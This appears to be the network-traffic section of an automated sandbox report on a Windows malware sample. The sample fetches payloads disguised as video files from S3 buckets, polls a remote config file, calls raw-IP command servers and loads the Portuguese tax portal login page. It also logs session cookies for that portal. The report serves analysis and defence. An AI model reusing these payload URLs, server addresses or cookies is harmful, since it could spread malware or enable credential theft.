Source: global trafficHTTP traffic detected: GET /autentica_static/js/jquery/jquery-1.11.1.min.js?cb=5.2.10 HTTP/1.1Host: www.acesso.gov.ptConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.acesso.gov.pt/v2/loginForm?partID=PFAP&path=/geral/dashboardAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: autentica_JSessionID=v94q-SXkLAYqAtLB6_lnQu2GvdIe4Wm7jgRnhGPyN3vr0Me0rpbc!-1109972721!1841467755; AT_P=!jpkTbJ5+N2SHod6XNCYICHCNuUpMaRiJA2aJlJ5+5tvwdf7pXWhyakT6FGhChwrLyP3Q42SGHpieYRU=; TS017b475d=01e43c52fe574d01ed8b893772efbea94ecbd5572a9ad7484fbf931cc90bae72c1718326205d41557602b18e641c96a372f1ae483a; TSbfdc4c04027=08def0a5edab20008e094d6193eafe9765c8c62a006c8cd37867b35d7e58c2d7eccaaf1053610f890866179f65113000db1f249c366326fd9c1d48464b082592a78ba2a12dfbdc4ad19e31ad68bde2b2631e5f5094ee8ea6e8c5651de3180039
Source: global trafficHTTP traffic detected: GET /autentica_static/js/jquery/jquery.validate.min.js?cb=5.2.10 HTTP/1.1Host: www.acesso.gov.ptConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.acesso.gov.pt/v2/loginForm?partID=PFAP&path=/geral/dashboardAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: autentica_JSessionID=v94q-SXkLAYqAtLB6_lnQu2GvdIe4Wm7jgRnhGPyN3vr0Me0rpbc!-1109972721!1841467755; AT_P=!jpkTbJ5+N2SHod6XNCYICHCNuUpMaRiJA2aJlJ5+5tvwdf7pXWhyakT6FGhChwrLyP3Q42SGHpieYRU=; TS017b475d=01e43c52fe574d01ed8b893772efbea94ecbd5572a9ad7484fbf931cc90bae72c1718326205d41557602b18e641c96a372f1ae483a; TSbfdc4c04027=08def0a5edab20008e094d6193eafe9765c8c62a006c8cd37867b35d7e58c2d7eccaaf1053610f890866179f65113000db1f249c366326fd9c1d48464b082592a78ba2a12dfbdc4ad19e31ad68bde2b2631e5f5094ee8ea6e8c5651de3180039
Source: global trafficHTTP traffic detected: GET /autentica_static/js/jquery/jquery.uniform.min.js?cb=5.2.10 HTTP/1.1Host: www.acesso.gov.ptConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.acesso.gov.pt/v2/loginForm?partID=PFAP&path=/geral/dashboardAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: autentica_JSessionID=v94q-SXkLAYqAtLB6_lnQu2GvdIe4Wm7jgRnhGPyN3vr0Me0rpbc!-1109972721!1841467755; AT_P=!jpkTbJ5+N2SHod6XNCYICHCNuUpMaRiJA2aJlJ5+5tvwdf7pXWhyakT6FGhChwrLyP3Q42SGHpieYRU=; TS017b475d=01e43c52fe574d01ed8b893772efbea94ecbd5572a9ad7484fbf931cc90bae72c1718326205d41557602b18e641c96a372f1ae483a; TSbfdc4c04027=08def0a5edab20008e094d6193eafe9765c8c62a006c8cd37867b35d7e58c2d7eccaaf1053610f890866179f65113000db1f249c366326fd9c1d48464b082592a78ba2a12dfbdc4ad19e31ad68bde2b2631e5f5094ee8ea6e8c5651de3180039
Source: global traffic
HTTP traffic detected: GET /at/html//autentica_static/logos/logotipo_AT.png HTTP/1.1
Host: www.portaldasfinancas.gov.pt
Connection: keep-alive
sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.acesso.gov.pt/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Source: global traffic
HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
Range: bytes=0-2147483646
User-Agent: Microsoft BITS/7.8
Host: fs.microsoft.com
Source: global traffic
HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=rBgTCMhWGuf+1Pc&MD=RoRLZT8E HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
Host: slscr.update.microsoft.com

Source: global traffic
HTTP traffic detected: GET /basketchampion.mp4 HTTP/1.1
User-Agent: lspcv2.exe
Host: happychristmaslegado.s3.eu-north-1.amazonaws.com
Cache-Control: no-cache

Source: global traffic
HTTP traffic detected: GET /alphaville.mp4 HTTP/1.1
User-Agent: place.exe
Host: happychristmaslegado.s3.eu-north-1.amazonaws.com
Cache-Control: no-cache

Source: global traffic
HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=rBgTCMhWGuf+1Pc&MD=RoRLZT8E HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
Host: slscr.update.microsoft.com

Source: global traffic
HTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
Source: global traffic
HTTP traffic detected: GET /41907bc4-chronocromdocrom/integra/conf.txt HTTP/1.1
User-Agent: ler1255.txt
Host: s3.timeweb.com
Source: global traffic
HTTP traffic detected: GET /41907bc4-chronocromdocrom/integra/conf.txt HTTP/1.1
User-Agent: ler8109.txt
Host: s3.timeweb.com
If-Modified-Since: Mon, 30 Oct 2023 15:08:01 GMT
If-None-Match: "8cc325c4a72b846a690145124f81749a"
Source: global trafficHTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule704000v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule704001v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703301v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703300v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120128v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230104v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230157v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230158v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230162v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230165v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230164v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230166v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230167v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230168v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230169v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230170v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic
HTTP traffic detected:
GET /41907bc4-chronocromdocrom/integra/conf.txt HTTP/1.1
User-Agent: ler4151.txt
Host: s3.timeweb.com
If-Modified-Since: Mon, 30 Oct 2023 15:08:01 GMT
If-None-Match: "8cc325c4a72b846a690145124f81749a"
Source: global traffic
HTTP traffic detected:
GET /41907bc4-chronocromdocrom/integra/conf.txt HTTP/1.1
User-Agent: ler2195.txt
Host: s3.timeweb.com
If-Modified-Since: Mon, 30 Oct 2023 15:08:01 GMT
If-None-Match: "8cc325c4a72b846a690145124f81749a"
Source: global traffic
DNS traffic detected: DNS query: privacidadeepreferenciapt.s3.eu-north-1.amazonaws.com
Source: global traffic
DNS traffic detected: DNS query: www.acesso.gov.pt
Source: global traffic
DNS traffic detected: DNS query: static.portaldasfinancas.gov.pt
Source: global traffic
DNS traffic detected: DNS query: www.google.com
Source: global traffic
DNS traffic detected: DNS query: www.portaldasfinancas.gov.pt
Source: global traffic
DNS traffic detected: DNS query: happychristmaslegado.s3.eu-north-1.amazonaws.com
Source: global traffic
DNS traffic detected: DNS query: s3.timeweb.com
Source: global traffic
HTTP traffic detected:
HTTP/1.1 404 Not Found
Date: Thu, 14 Nov 2024 13:59:55 GMT
X-Frame-Options: SAMEORIGIN
Content-Length: 315
Content-Type: text/html; charset=iso-8859-1
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains
Set-Cookie: AT_P=!uQTuTYfOdmp4l5iXNCYICHCNuUpMaeEZ4wzloG6HQNB+tifpD1BMCIL85dQ+gBTJbL0POc/AMS+tJuA=; path=/; Httponly; Secure; SameSite=strict
Set-Cookie: TS01bc69dc=01e43c52fe02e876414b488368fbd5750f7a8763a3f38f477fe50b2da2ba10c916a4e119ebde3f6846260fb1b396afeabd0dbfebaa; Path=/; Secure; HTTPOnly
Set-Cookie: TS7d2bcbce027=08def0a5edab200057f1248157f3b8841b251fc39b1b6e1bf75c4ec867a31b2f64e663decd9af72a089dd318321130009a4753c39781e5dd5506ed5fe4b51845d08cb401546f81e3bc806e4ebb2ab6d43164d63fc5daddfacf3ef06f9732c57e; Secure; Path=/
Vary: Accept-Encoding
Source: place.exe, 00000008.00000000.2060052919.0000000000BE3000.00000002.00000001.01000000.0000000D.sdmp, place.exe, 00000008.00000002.2972396912.000001477F56A000.00000004.00001000.00020000.00000000.sdmp
String found in binary or memory: http://185.178.46.42/vo/
Source: place.exe, 00000008.00000002.2967068820.00000002F938A000.00000004.00000010.00020000.00000000.sdmp
String found in binary or memory: http://185.178.46.42/vo/U
Source: lspcv2.exe, 00000009.00000002.2982463608.00000145E4A0A000.00000004.00001000.00020000.00000000.sdmp
String found in binary or memory: http://94.241.141.101/dm4/
Source: lspcv2.exe, 00000009.00000002.2982463608.00000145E49BC000.00000004.00001000.00020000.00000000.sdmp
String found in binary or memory: http://94.241.141.101/dm4/publi.php
Source: lspcv2.exe, 00000009.00000002.2982463608.00000145E4A03000.00000004.00001000.00020000.00000000.sdmp
String found in binary or memory: http://94.241.141.101/dm4/publi.php03
Source: artigo.exe, 00000005.00000002.2970291807.0000020EFAC1D000.00000004.00000020.00020000.00000000.sdmp
String found in binary or memory: https://happychristmaslegado.s3.eu-north-1.amazonaws.com/
Source: artigo.exe, 00000005.00000002.2970291807.0000020EFABE5000.00000004.00000020.00020000.00000000.sdmp, artigo.exe, 00000005.00000002.2976258249.0000020EFAC42000.00000004.00000020.00020000.00000000.sdmp, artigo.exe, 00000005.00000003.2083615098.0000020EFAC40000.00000004.00000020.00020000.00000000.sdmp, artigo.exe, 00000005.00000002.2978883513.0000020EFC4BD000.00000004.00001000.00020000.00000000.sdmp
String found in binary or memory: https://happychristmaslegado.s3.eu-north-1.amazonaws.com/alphaville.mp4
Source: artigo.exe, 00000005.00000002.2970291807.0000020EFABE5000.00000004.00000020.00020000.00000000.sdmp
String found in binary or memory: https://happychristmaslegado.s3.eu-north-1.amazonaws.com/alphaville.mp43
Source: artigo.exe, 00000005.00000002.2970291807.0000020EFABE5000.00000004.00000020.00020000.00000000.sdmp
String found in binary or memory: https://happychristmaslegado.s3.eu-north-1.amazonaws.com/alphaville.mp4B
Source: artigo.exe, 00000005.00000002.2970291807.0000020EFABE5000.00000004.00000020.00020000.00000000.sdmp
String found in binary or memory: https://happychristmaslegado.s3.eu-north-1.amazonaws.com/alphaville.mp4C
Source: artigo.exe, 00000005.00000002.2970291807.0000020EFABE5000.00000004.00000020.00020000.00000000.sdmp, artigo.exe, 00000005.00000002.2978883513.0000020EFC4BD000.00000004.00001000.00020000.00000000.sdmp
String found in binary or memory: https://happychristmaslegado.s3.eu-north-1.amazonaws.com/basketchampion.mp4
Source: artigo.exe, 00000005.00000002.2970291807.0000020EFABE5000.00000004.00000020.00020000.00000000.sdmp
String found in binary or memory: https://happychristmaslegado.s3.eu-north-1.amazonaws.com/basketchampion.mp4%
Source: artigo.exe, 00000005.00000002.2970291807.0000020EFABE5000.00000004.00000020.00020000.00000000.sdmp
String found in binary or memory: https://happychristmaslegado.s3.eu-north-1.amazonaws.com/basketchampion.mp401
Source: artigo.exe, 00000005.00000002.2970291807.0000020EFABE5000.00000004.00000020.00020000.00000000.sdmp
String found in binary or memory: https://happychristmaslegado.s3.eu-north-1.amazonaws.com/basketchampion.mp4Y
Source: artigo.exe, 00000005.00000002.2970291807.0000020EFABE5000.00000004.00000020.00020000.00000000.sdmp
String found in binary or memory: https://happychristmaslegado.s3.eu-north-1.amazonaws.com/basketchampion.mp4bif
Source: wscript.exe, 00000000.00000003.1681815966.000002232440C000.00000004.00000020.00020000.00000000.sdmp
String found in binary or memory: https://heapanalytics.com
Source: wscript.exe, 00000000.00000003.1681815966.000002232440C000.00000004.00000020.00020000.00000000.sdmp
String found in binary or memory: https://heapanalytics.com/css/ved.css
Source: wscript.exe, 00000000.00000003.1681815966.000002232440C000.00000004.00000020.00020000.00000000.sdmp
String found in binary or memory: https://heapanalytics.com/js/ved.css
Source: wscript.exe, 00000000.00000003.1681815966.000002232440C000.00000004.00000020.00020000.00000000.sdmp
String found in binary or memory: https://heapanalytics.com/js/ved.js
Source: wscript.exe, wscript.exe, 00000000.00000003.1830358182.000002232986E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1831533016.000002232986E000.00000004.00000020.00020000.00000000.sdmp
String found in binary or memory: https://privacidadeepreferenciapt.s3.eu-north-1.amazonaws.com/prefere
Source: wscript.exe, 00000000.00000003.1803487559.0000022321A63000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1681815966.000002232440C000.00000004.00000020.00020000.00000000.sdmp
String found in binary or memory: https://privacidadeepreferenciapt.s3.eu-north-1.amazonaws.com/preferencia.cdr
Source: wscript.exe, 00000000.00000003.1803487559.0000022321A63000.00000004.00000020.00020000.00000000.sdmp
String found in binary or memory: https://privacidadeepreferenciapt.s3.eu-north-1.amazonaws.com/preferencia.cdrIVE=C
Source: place.exe, 00000008.00000000.2060052919.0000000000BE3000.00000002.00000001.01000000.0000000D.sdmp
String found in binary or memory: https://s3.timeweb.com/41907bc4-chronocromdocrom/one/cnf.txt
Source: wscript.exe, 00000000.00000003.1889781026.00000223257A9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1682280484.0000022323832000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1831533016.000002232986E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1682753596.0000022324BE0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1803487559.0000022321A63000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1681815966.000002232440C000.00000004.00000020.00020000.00000000.sdmp
String found in binary or memory: https://www.acesso.gov.pt/v2/loginForm?partID=PFAP&path=/geral/dashboard
Source: wscript.exe, 00000000.00000003.1684071613.0000022321D2B000.00000004.00000020.00020000.00000000.sdmp
String found in binary or memory: https://www.acesso.gov.pt/v2/loginForm?partID=PFAP&path=/geral/dashboardc
Source: wscript.exe, 00000000.00000003.1803487559.0000022321A63000.00000004.00000020.00020000.00000000.sdmp
String found in binary or memory: https://www.acesso.gov.pt/v2/loginForm?partID=PFAP&path=/geral/dashboardrvc
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
Source: unknownNetwork traffic detected: HTTP traffic on port 50144 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
Source: unknownNetwork traffic detected: HTTP traffic on port 50095 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50176 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
Source: unknownNetwork traffic detected: HTTP traffic on port 50084 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
